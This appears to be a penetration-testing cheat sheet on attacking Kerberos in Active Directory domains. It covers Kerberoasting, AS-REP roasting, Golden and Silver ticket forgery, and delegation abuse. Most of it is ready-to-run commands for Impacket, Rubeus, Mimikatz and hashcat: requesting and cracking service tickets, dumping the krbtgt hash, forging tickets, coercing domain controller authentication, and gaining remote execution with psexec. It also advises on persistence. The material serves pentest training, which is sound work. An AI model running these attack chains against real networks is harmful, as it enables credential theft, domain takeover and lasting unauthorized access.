Exploitation

Kerberos Attacks

Exploit Kerberos authentication weaknesses to obtain service account credentials, forge tickets, and escalate privileges.

Tool Installation

GetUserSPNs

Part of Impacket suite

pip install impacket

Rubeus

Windows Kerberos toolkit

github.com/GhostPack/Rubeus

Mimikatz

Credential extraction

github.com/gentilkiwi/mimikatz

Hashcat

GPU hash cracking

hashcat.net

Kerberoasting

Request TGS tickets for service accounts and crack them offline. Any domain user can request tickets for SPNs.

Why It Works:

  • TGS tickets are encrypted with the service account's NTLM hash
  • Any authenticated user can request a TGS for any SPN
  • The ticket can be cracked offline without triggering lockouts
  • Service accounts often have weak passwords and high privileges

High-Value Targets:

  • MSSQL - Database service accounts
  • Exchange - Often have Domain Admin privs
  • IIS - Web service accounts
  • Custom SPNs - Admin-created service accounts

GetUserSPNs (Impacket)

bash 
# List all SPNs (enumerate first)
GetUserSPNs.py corp.local/user:password -dc-ip DC_IP

# Request TGS tickets and save to file
GetUserSPNs.py corp.local/user:password -dc-ip DC_IP -request -outputfile kerberoast.txt

# Target specific high-value user
GetUserSPNs.py corp.local/user:password -dc-ip DC_IP -request-user sqlservice

# Use with hash (PtH)
GetUserSPNs.py corp.local/user -hashes :NTLM_HASH -dc-ip DC_IP -request

# Output in hashcat format (default)
GetUserSPNs.py corp.local/user:password -dc-ip DC_IP -request -outputfile hashes.txt

# Output in john format
GetUserSPNs.py corp.local/user:password -dc-ip DC_IP -request -outputfile hashes.txt -format john

Rubeus (Windows)

Rubeus is the go-to Windows tool for Kerberos attacks. Download pre-compiled from GitHub releases.

powershell 
# Kerberoast all SPNs
Rubeus.exe kerberoast /outfile:hashes.txt

# Kerberoast with RC4 downgrade (easier to crack)
# Forces RC4 encryption instead of AES
Rubeus.exe kerberoast /tgtdeleg /outfile:hashes.txt

# Target specific user
Rubeus.exe kerberoast /user:sqlservice /outfile:hashes.txt

# Kerberoast with alternate credentials
Rubeus.exe kerberoast /creduser:CORP\user /credpassword:pass

# Filter by encryption type
Rubeus.exe kerberoast /rc4opsec /outfile:hashes.txt  # Only RC4
Rubeus.exe kerberoast /aes /outfile:hashes.txt       # Include AES

Tip

RC4 vs AES: RC4 (etype 23) hashes crack ~10-100x faster than AES256 (etype 18). Use /tgtdeleg to request RC4 tickets when possible.

Crack TGS Hashes

Hash Type Hashcat Mode Speed
TGS-REP RC4 13100 ~500 MH/s (RTX 3090)
TGS-REP AES128 19600 ~10 MH/s
TGS-REP AES256 19700 ~5 MH/s
bash 
# Hashcat - Kerberos 5 TGS-REP (RC4) - Fastest
hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt

# Hashcat - Kerberos 5 TGS-REP (AES256) - Slower
hashcat -m 19700 kerberoast.txt /usr/share/wordlists/rockyou.txt

# With rules for better coverage
hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule

# John the Ripper
john --format=krb5tgs kerberoast.txt --wordlist=/usr/share/wordlists/rockyou.txt

AS-REP Roasting

Target accounts with "Do not require Kerberos preauthentication" enabled. No authentication needed.

Finding AS-REP Roastable Accounts:

  • User must have DONT_REQ_PREAUTH flag set
  • Often set for legacy applications or misconfigurations
  • Can be queried with LDAP: userAccountControl:1.2.840.113556.1.4.803:=4194304

GetNPUsers (Impacket)

bash 
# Unauthenticated - requires username list
GetNPUsers.py corp.local/ -dc-ip DC_IP -usersfile users.txt -no-pass

# Authenticated - finds AS-REP accounts automatically
GetNPUsers.py corp.local/user:password -dc-ip DC_IP -request

# Output to file for cracking
GetNPUsers.py corp.local/ -dc-ip DC_IP -usersfile users.txt -no-pass -outputfile asrep.txt

# With hash (Pass-the-Hash)
GetNPUsers.py corp.local/user -hashes :NTLM_HASH -dc-ip DC_IP -request

# Enumerate all users first, then check
kerbrute userenum --dc DC_IP -d corp.local users.txt  # Find valid users
GetNPUsers.py corp.local/ -dc-ip DC_IP -usersfile valid_users.txt -no-pass

Rubeus AS-REP Roast

powershell 
# Find and roast AS-REP accounts
Rubeus.exe asreproast /outfile:asrep.txt

# Target specific user
Rubeus.exe asreproast /user:svc_backup /outfile:asrep.txt

Crack AS-REP Hashes

bash 
# Hashcat - Kerberos 5 AS-REP (mode 18200)
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt

# With rules
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule

# John the Ripper
john --format=krb5asrep asrep.txt --wordlist=/usr/share/wordlists/rockyou.txt

Warning

AS-REP vs Kerberoasting: AS-REP uses mode 18200, Kerberoasting uses 13100. Using the wrong mode will fail silently.

Golden Ticket

Forge TGT using the krbtgt hash. Provides unlimited access to all services in the domain.

Requirements:

  • krbtgt NTLM hash - From DCSync or NTDS.dit extraction
  • Domain SID - e.g., S-1-5-21-3623811015-3361044348-30300820
  • Domain name - FQDN (corp.local)

Tip

Persistence: Golden tickets remain valid until the krbtgt password is changed twice (to clear history). This is often never done, making it excellent for persistence.

Create Golden Ticket (Impacket)

bash 
# Step 1: Get domain SID
lookupsid.py corp.local/admin:password@dc.corp.local
# Or with PowerShell: (Get-ADDomain).DomainSID

# Step 2: Get krbtgt hash (requires Domain Admin or DCSync)
secretsdump.py corp.local/admin:password@dc.corp.local -just-dc-user krbtgt

# Step 3: Create golden ticket
ticketer.py -nthash <KRBTGT_HASH> -domain-sid S-1-5-21-... -domain corp.local Administrator

# Step 4: Use the ticket
export KRB5CCNAME=Administrator.ccache
psexec.py -k -no-pass corp.local/Administrator@target.corp.local
secretsdump.py -k -no-pass dc.corp.local  # DCSync with golden ticket

Golden Ticket with Mimikatz

text 
# Create and inject golden ticket directly
mimikatz# kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-... /krbtgt:HASH /ptt

# Create ticket with specific groups (add to Domain Admins, etc.)
mimikatz# kerberos::golden /user:FakeAdmin /domain:corp.local /sid:S-1-5-21-... /krbtgt:HASH /groups:512,513,518,519,520 /ptt

# Save ticket to file instead of injecting
mimikatz# kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-... /krbtgt:HASH /ticket:golden.kirbi

# Verify ticket loaded
mimikatz# kerberos::list
klist  # Windows command

# Access any resource in the domain
dir \\dc.corp.local\c$
dir \\fileserver.corp.local\c$

Silver Ticket

Forge TGS for specific service using the service account hash. More targeted than Golden Ticket.

Silver vs Golden:

  • Golden: Access everything, requires krbtgt hash
  • Silver: Access specific service, requires service account hash
  • Silver tickets don't touch DC - harder to detect
  • Use machine account hash ($) for services running as SYSTEM
Service SPN Use Case
File Shares cifs/host Access C$, ADMIN$, file shares
WinRM http/host, wsman/host PowerShell remoting
SQL Server mssql/host Database access
LDAP ldap/host DCSync (on DC)
bash 
# Create silver ticket for CIFS (file shares)
# Use machine account hash (TARGET$) from secretsdump
ticketer.py -nthash <MACHINE_HASH> -domain-sid S-1-5-21-... -domain corp.local -spn cifs/target.corp.local Administrator

# Silver ticket with Mimikatz
mimikatz# kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-... /target:target.corp.local /service:cifs /rc4:HASH /ptt

# Use the ticket
export KRB5CCNAME=Administrator.ccache
smbclient.py -k -no-pass corp.local/Administrator@target.corp.local

# Silver ticket for WinRM
ticketer.py -nthash <HASH> -domain-sid S-1-5-21-... -domain corp.local -spn http/target.corp.local Administrator
evil-winrm -i target.corp.local -r corp.local

Delegation Attacks

Kerberos delegation allows services to impersonate users to access other services. Misconfigured delegation is a common privilege escalation path.

Delegation Types:

  • Unconstrained - Can impersonate ANY user to ANY service (TrustedForDelegation)
  • Constrained - Can impersonate users to SPECIFIC services (msDS-AllowedToDelegateTo)
  • RBCD - Resource controls who can delegate TO it (msDS-AllowedToActOnBehalfOfOtherIdentity)

Unconstrained Delegation

When users authenticate to unconstrained delegation hosts, their TGT is cached. Coerce a DC to authenticate and capture its ticket.

powershell 
# Find unconstrained delegation computers
Get-ADComputer -Filter {TrustedForDelegation -eq $true}
Get-ADUser -Filter {TrustedForDelegation -eq $true}

# Impacket findDelegation
findDelegation.py corp.local/user:password -dc-ip DC_IP

# CrackMapExec module
crackmapexec ldap DC_IP -u user -p pass -M find_delegation

# On delegation host - extract cached tickets
mimikatz# sekurlsa::tickets /export

# Monitor for incoming tickets (Rubeus)
Rubeus.exe monitor /interval:5 /filteruser:DC$

# Coerce DC to authenticate (PrinterBug/PetitPotam)
python printerbug.py corp.local/user:password@DC DELEGATION_HOST

Constrained Delegation (S4U)

If you compromise an account with constrained delegation, you can impersonate ANY user to the allowed services.

bash 
# Find constrained delegation
findDelegation.py corp.local/user:password -dc-ip DC_IP

# Look for msDS-AllowedToDelegateTo attribute
Get-ADUser -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo

# S4U2Self + S4U2Proxy attack
# Get service ticket as Administrator to the allowed SPN
getST.py -spn cifs/target.corp.local -impersonate Administrator corp.local/svc_sql:password

# With hash
getST.py -spn cifs/target.corp.local -impersonate Administrator -hashes :HASH corp.local/svc_sql

# Use the ticket
export KRB5CCNAME=Administrator.ccache
psexec.py -k -no-pass corp.local/Administrator@target.corp.local
secretsdump.py -k -no-pass target.corp.local

Tip

SPN Modification: The target SPN in a delegated ticket can sometimes be modified. If delegation allows cifs/server, you may be able to change it to ldap/server for DCSync.

Resource-Based Constrained Delegation (RBCD)

RBCD lets you configure delegation ON the target resource. If you can write to msDS-AllowedToActOnBehalfOfOtherIdentity, you can compromise the target.

RBCD Requirements:

  • Write access to target's msDS-AllowedToActOnBehalfOfOtherIdentity
  • A computer account you control (or ability to create one)
  • Target must not be protected (Protected Users group)
bash 
# Step 1: Add computer account (any domain user can add up to 10)
addcomputer.py -computer-name YOURPC -computer-pass Password123 corp.local/user:password

# Step 2: Set RBCD attribute on target (requires write access)
rbcd.py -delegate-to TARGET$ -delegate-from YOURPC$ -dc-ip DC_IP corp.local/user:password -action write

# Alternative: Use PowerShell
Set-ADComputer TARGET -PrincipalsAllowedToDelegateToAccount YOURPC$

# Step 3: Get ticket via S4U as Administrator
getST.py -spn cifs/target.corp.local -impersonate Administrator corp.local/YOURPC$:Password123

# Step 4: Use ticket
export KRB5CCNAME=Administrator.ccache
secretsdump.py -k -no-pass target.corp.local
psexec.py -k -no-pass target.corp.local

Tip

Kerberoasting and AS-REP Roasting are low-noise attacks that don't trigger account lockouts. They should be part of every internal pentest.

External Resources

The Hacker Recipes - Kerberos

Comprehensive Kerberos attack reference

Rubeus - GitHub

Windows Kerberos toolkit with examples

HackTricks - Kerberoast

Detailed Kerberoasting walkthrough

AD Security - Kerberoasting

Sean Metcalf's original Kerberoasting research

ired.team - Kerberos Abuse

Red Team notes on Kerberos attacks

SpecterOps - Delegation

Deep dive into delegation attacks

Related Topics

Relay Attacks

NTLM relay techniques

Lateral Movement

Move through the network

AD Attack Paths

Deep dive into Kerberos